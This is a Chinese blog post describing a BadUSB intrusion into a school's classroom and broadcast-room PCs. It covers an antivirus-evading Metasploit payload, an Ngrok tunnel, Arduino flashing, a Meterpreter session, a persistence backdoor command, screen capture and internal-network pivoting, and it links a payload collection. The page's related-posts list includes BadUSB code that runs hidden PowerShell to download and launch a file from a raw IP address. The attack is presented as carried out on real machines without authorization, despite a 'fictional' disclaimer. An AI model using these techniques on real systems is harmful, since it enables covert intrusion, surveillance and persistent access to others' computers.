badusb代码_携Badusb进校园的系列测试

最新推荐文章于 2023-08-04 11:30:00 发布
最新推荐文章于 2023-08-04 11:30:00 发布
阅读量184 收藏 3
点赞数
文章标签: badusb代码

原创 Scan 合天智汇

本文所用到的工具:

  • Badusb
  • Ngrok
  • Arduino
  • Msfconsole
  • Msfvenom
  • 迷你相机

0x01蓄谋已久的前言

每次上楼时,都能看见广播室门开得非常宽

c6dd0d80782b9ce5d5858cf9145a4385.png

但这不是重点,重点是里面的电脑(WindowsXP),电脑桌面上是LED大屏幕的编辑软件。

22aaad2764adf428e524a979166c41ee.png

二楼有个网络管理箱并由管道内的网线传输到每个教室的多媒体(Windows10)。

83503217a55c5ad7f93424b61eafc815.png

看看兜里的Badusb,突然就散发出了浓浓的香味,哧溜~~~。

俗话说“艺高人胆大”,但吾也要:武艺不高强,菜鸟也先飞!

14d20fd0296a8df29148e88909920ba4.png

0x02分析并整理收集到的信息

主机

系统

杀毒软件

网络状态

广播室

Windows XP

不详

不详

多媒体

Windows 10

Defender、360

正常

而且我们从二楼的网络管理箱分支网线的管道可推断出二楼所有教师的多媒体属于同一内网。我们在烧录代码的时候,就要根据不同的系统版本,网络状态,杀毒软件等因素来进行烧录。为什么说广播室的具体信息我们获取不到呢?因为“可远观,而不可亵玩焉。”

ef0392b8ae825b9e07659c95973947fc.png

0x03部署Payload及规避模块到Ngrok

首先我们使用规避模块生成一个WindowsEXE文件来规避WindwosDefender程序,操作如下:

showevasuib

a4d57ab429d616963f543d590452c310.png
ca01fde162f5c25cf5af261cf05a91e1.png
2405e4f51fa8a029c3c713afed3ad770.png

接着run可以看到生成的FILENAME(文件名是随机的)

当然也可以自定义SetFILENAME 文件名即可

生成的文件保存到了

/root/.msf4/local/yZdsypg.exe

接下来我们来部署反弹环境,在这里来注册一个账户

登录后来到后台页面点击

e1a205efd8f8f231e5965a6e75f3af5b.png

当然也有免费的隧道,不过网速较慢,根据自己的情况而定!

5cd4bb20f682953f67e3b12e837e6237.png

接着我们点击立即购买,会跳转到隧道配置的页面,如图:

e66111b60d1c3f09c22c8abf03800541.png

使用ping服务器地址命令,找到IP地址。

1c935af4f8f820b7a0f1939e672884e6.png

接着我们打开刚解压下来的文件夹

输入./sunnyclientid 填写你的隧道ID

f7d3e7e5ecac565df2faac578b60fb01.png

出现这个界面就代表隧道连接成功!

53059499c07984fae59a38625d3984bf.png

接着我们用Msfvenom生成可执行文件,代码如下

c4c4abc838c2751bf8b726d7c028feeb.png

注:如果是64位系统,Payload则更改为:windows/x64/meterpreter/reverse_tcp对于小白很陌生带两个值是可以实现自动迁移进程的功能,关闭其中一进程并不影响另一进程。

-k选项并不适用于所有模板,请提前做好测试。

实验:MSFvenom实践

http://www.hetianlab.com/expc.do?ec=ECID9db0-7e22-486f-a628-023583616a83(通过该实验了解msfvenom和metasploit的用法)

987ef686899ec7d2c1ff9685dcab8654.png

0x04安装Arduino

首先我们打开arduino安装包

da0eaa7ed20c110b6f79c7b85f36bce8.png
8f4d13ca696fd2428d5f9cc305b19ea6.png
b8767fa661d80e0319f327bed5ba9922.png
821af86ffb131a14440a041563e28d2d.png
07e1856498b7e660376677363c68553a.png

完成了安装。

配置如下:

51e3234f54337842fc1112ecd5bc247e.png

完成安装。

346a20342771f2a11dec4bbc894d0593.png

0x05烧录代码

代码贴出:

6b907253ceed928f9e02bb02159dce11.png
73b322865917365bc3c498fa45d7c23e.png

更多代码在文章底部有相关信息,不要着急!

编译好之后我们直接上传即可完成烧录,直接点击上传可以检查编译并上传。

0x06Shell快到碗里来

cf6dbcccedf818abc550733209a56cec.png

让基友给我代插烧鹅:

2b3d059ae911215a762757ee41f76d14.png

如图:

37aadc91eba5db4277e0d9a4ee5cfc8f.png

我们已经获取到了Meterpreter会话,现在我们可以为所欲为了!

为了防止亡羊补牢,要一劳永逸,我们先添加一个持久后门,命令如下:

runpersistence -X -i 5 -p 端口-rIP

or

runmetsvc

第二种方法直接监听即可,具体方法找谷哥和度娘。

e8ec8ce90177664b754c56a32b4d0d30.png

附带一张屏幕截图:

screenshot

40d7484c60df16e355569805d29a2f7e.png

打开偷窥一下:

f6e010610c44dedea3ca00afb55b000c.png

实验:Metasploit制作木马后门

http://www.hetianlab.com/expc.do?ec=ECID1932-04d9-4856-88c7-e02fb889edd3(通过实验来亲手使用meterpreter留nc后门)

0x07内网漫游

4e92ce30ac2f2083ebfb5d81e512eb8e.png

查看子网:runget_local_subnets

添加路由:routeadd 子网掩码 会话id

查看路由:routeprint

自动化添加路由:loadauto_add_route

fdf97ead16140785e4251d6fb2cbbc29.png

额.......好吧得退出meterpreter会话,因不可描述因素,就这样吧。

提示得运行一个Post模块,并且添加参数,大家明白就好。

设置完毕后接下来就看自己的操作了,

广播室也被搞定,也是因不可描述规章制度等原因不再继续。正文到此结束。

总结:

1.要提前知晓操作系统。

2.根据不同的系统要构造不同的Payload。

3.采用多种可执行后缀(bat、exe、docx)。

4.获取Shell要第一时间添加后门。

5.不推荐使用Ngrok,自行百度其他平台,但使用方法基本一致。

6.添加完路由如果有网络异常状态,则删除路由条目。

代码以烧录器整理集合如下:

(均来自互联网、适用与否请提前在虚拟机测试)

打开烧录脚本软件,点击文件--打开即可。

链接:https://pan.baidu.com/s/17UCyKosBkjCRb7IBfxfdPg

提取码:btmz

声明:本文仅供参考,内容仅为虚构,代码以及使用方法切勿使用于非法用途!

weixin_39814482
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
badusb代码_badusb攻击代码
weixin_39887183的博客
11-28 2387
badusb攻击(msfconsole)准备badusbArduino下载软件点击下载运行软件在工具菜单中 选择,选择badusb的端口和开发版。注入代码windows10系统#includevoidsetup(){Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(50...
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
badusb代码daquan.zip
06-22
badusb代码daquan.zip
BadUsb程序大全-值得收藏
门柚的博客
07-31 1536
BadUsb程序大全-值得收藏
基于ArduinoLeonardo板子的BadUSB攻击实战
weixin_34376562的博客
04-11 576
0X00 前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma同学的《使用arduino进行渗透测试》则通过SET与Arduino的结合进行渗透,mrzcpo同学的 《HID高级攻击姿势:利用PowerShell脚本进行文件窃取》则介绍了获...
badusb示例代码可绕过360
OKAY_TC的博客
10-16 3170
绕过360版本代码: void setup() { // putpower shell your setup code here, to run once Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//...
使用kali nethunter执行badUSB攻击--基于Rucky工具
geek-7的博客
04-14 1852
使用kali net hunter的rucky工具进行HID攻击。含攻击脚本语法及范文,攻击思路。
USB攻击系列BadUSB实现CS上线和反弹shell
最新发布
m0_59598029的博客
08-04 292
我们发现BadUSB在linux和macos上不需要过免杀,但是无法通过windows上的杀软,于是有了以下的研究。BadUSB硬件和Arduino软件(https://www.arduino.cc/en/software)打开Arduino的ide工具,选择端口选中Arduino开发板编辑windows测试脚本,启动cmd命令行,实现whoami,编译上传随即成功执行whoami,基础的模拟键盘的操作,杀软是通过的,但是一旦有恶意行为,杀软会自动查杀并阻止。
利用badusb对用户进行木马远控
ghtwf01的博客
12-01 1876
文章首发先知社区:https://xz.aliyun.com/t/6386 最近接触到利用badsub进行攻击的方法,于是自己研究了一波,先给出一个badusb木马远控案例。 badusb简介 badusb是一种类似于U盘,插入后就会自动执行里面的恶意代码进行恶意操作,由于恶意代码是存在badusb存放固件的区域中,所以杀毒软件和U盘格式化都不能防御badusb攻击 badusb基本语法和arduino按键代码 入门badusb参考视频教程:https://www.bilibili.com/video/a
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
badusb代码.zip
07-25
分享一款badusb代码测试过还是可以正常使用。希望帮到有需要的小伙伴。
badusb_badusb_
09-29
badusb资料,需要自行打包带走
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
badusb制作工具包,需要自行打包带走
BadUsb资料.zip_BADUSB 文件下载_away_badusb驱动_eitherofo_televisionw8e
09-23
badusb资料,需要自行打包带走 (Badusb makes a toolkit that needs to be packaged and taken away by itself)
sketch_jan07a_Sketch!_badusb_
10-03
恶搞文件,关于badusb,只是一个小小文件
系统安全-BadUsb代码以及木马远控的制作(可绕过360)
Coisini的博客
05-31 9112
漏洞背景 是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作…. 硬件准备 这里我们使用的是: BS Micro pro micro leona...
简易BadUSB攻击效果不简单
02-09 1938
不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知…… 也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。 一、前期准备 Arduino: 这里使用的是BS Micro pro micro l...
插一个U盘黑一台电脑-Badusb最详细制作教程
热门推荐
J0o1ey Blog
08-01 2万+
0x001-简介 1.概述 在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。...
蓝屏终止代码bad_system_c
06-28
### 回答1: BAD_SYSTEM_CONFIG_INFO是Windows操作系统的一个蓝屏错误代码,通常表示系统配置信息损坏或丢失。这可能是由于硬件或软件问题引起的,例如系统文件损坏、驱动程序问题、磁盘错误等。要解决此问题,可以尝试使用Windows自带的修复工具,例如系统还原、系统文件检查器等。如果这些方法无法解决问题,可能需要重新安装操作系统。 ### 回答2: 蓝屏终止代码bad_system_c是一种比较常见的蓝屏错误代码,其出现主要是因为系统内部某些关键部分出现了故障或者bug,导致了系统崩溃无法正常运行。具体的原因可能涉及到硬件故障、驱动问题、系统文件损坏等多方面的原因。 出现蓝屏终止代码bad_system_c的情况下,常见的解决方案包括以下几个方面: 1. 进入安全模式。重启计算机之后按下F8键,选择进入安全模式,看能否正常进入系统,如果可以,则说明可能是驱动或者其他软件引起的问题,考虑卸载或更新相关软件。 2. 检查硬件。bad_system_c的出现也有可能是硬件出现了故障,建议检查硬盘、内存等硬件是否存在问题,如有必要,考虑更换相关硬件设备。 3. 升级或重新安装系统。如果以上两种方式都无法解决问题,可以考虑重新安装系统,或者使用系统还原等功能,将系统恢复到之前没有出现问题的状态。 总之,bad_system_c出现的原因很多,具体要看个案情况,解决方法也需要根据具体情况而定,需要有针对性地进行操作。前提是在做以上操作之前,切忌进行盲目尝试或者非专业操作,避免进一步恶化系统错误。 ### 回答3: 蓝屏终止代码bad_system_c是指操作系统出现了无法处理的严重错误,导致系统瘫痪,需要重新启动。这种错误通常是由于系统文件损坏、硬件驱动程序错误、系统内存或其他系统组件故障等原因引起的。 首先,可能是系统文件损坏导致的这个错误。当操作系统文件受到病毒、恶意软件或其他原因的攻击时,可能会出现该错误。因此,及时安装最新的杀毒软件和更新操作系统是防止这种情况的关键。 其次,硬件驱动程序错误可能是该错误的原因之一。驱动程序错误会导致操作系统不稳定或不能正常工作,由于系统和应用程序对硬件的依赖性,驱动程序错误导致的错误可能会很严重。所以,我们需要及时更新和维护硬件驱动程序。 最后可能原因是系统内存或其他系统组件故障引起的。系统内存故障可能会导致蓝屏。发生这种情况通常是由于系统内存条中有坏块。软件故障也可能是因为安装了不兼容的第三方软件或系统更新而被引起。在这种情况下,建议进行系统还原或重新安装系统以解决问题。 总之,蓝屏终止代码bad_system_c通常是由于系统错误或硬件损坏引起的。要避免这种情况,我们需要定期更新和维护系统文件、硬件和软件,及时安装最新的杀毒软件。如果蓝屏错误已经发生,我们可以尝试使用系统还原或重新安装系统等方法来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值